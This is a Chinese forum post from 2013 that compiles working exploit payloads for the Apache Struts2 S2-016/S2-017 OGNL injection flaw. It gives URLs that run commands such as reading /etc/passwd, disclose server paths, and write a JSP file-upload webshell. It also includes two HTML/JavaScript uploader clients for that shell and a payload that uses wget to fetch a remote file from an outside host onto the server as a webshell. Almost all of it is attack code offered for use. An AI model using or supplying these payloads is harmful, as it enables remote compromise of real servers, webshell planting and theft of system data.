标题:
Struts2 S2-016/S2-017漏洞执行代码
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了,我就整理了一下。友情提示,自己小命比shell重要哦。
喜欢就点一下感谢吧^_^
带回显命令执行:
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
爆路径:
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
写文件:
http://www.example.com/struts2-blank/example/X.action?redirect:
${
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
写入的文件内容:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
其实就是一个jsp的小马,需要客户端配合
参数f是文件名,t是内容
客户端:
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
" V& s% o( H7 c+ e% K
1 W! N. M2 K% n8 A: G( ^8 \
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
<center>
<input type=submit value="提交">
</form>
就在当前目录建立一个fjp.jsp
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
还有@园长的一个客户端:
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>jsp-园长</title>
</head>
<style>
.main{width:980px;height:600px;margin:0 auto;}
.url{width:300px;}
.fn{width:60px;}
.content{width:80%;height:60%;}
</style>
<script>
// Client-side helper for the form above: reads the three inputs (url, content, fn),
// refuses to continue (after an alert) at the first one that is empty, and otherwise
// points the form at the typed URL and submits it. Checks run in the order url,
// content, fileName, exactly as the alerts are worded.
function upload(){
    var byId = function(id){ return document.getElementById(id); };
    // Values are read up front, in the same order as the element look-ups below.
    var fields = [
        { value: byId('url').value,     message: "Url not allowd empty!" },
        { value: byId('content').value, message: "Content not allowd empty!" },
        { value: byId('fn').value,      message: "FileName not allowd empty!" }
    ];
    var targetForm = byId('fm');

    for (var i = 0; i < fields.length; i++) {
        if (fields[i].value.length == 0) {
            alert(fields[i].message);
            return;
        }
    }

    // fields[0] is the url the user typed in.
    targetForm.action = fields[0].value;
    targetForm.submit();
}
</script>
<body>
<div class="main">
<form id="fm" method="post">
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
<a href="javascript:upload();">Upload</a>
<textarea id="content" class="content" name="t" ></textarea>
</form>
</div>
</body>
</html>
还有@X发的一个wget的getshell
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}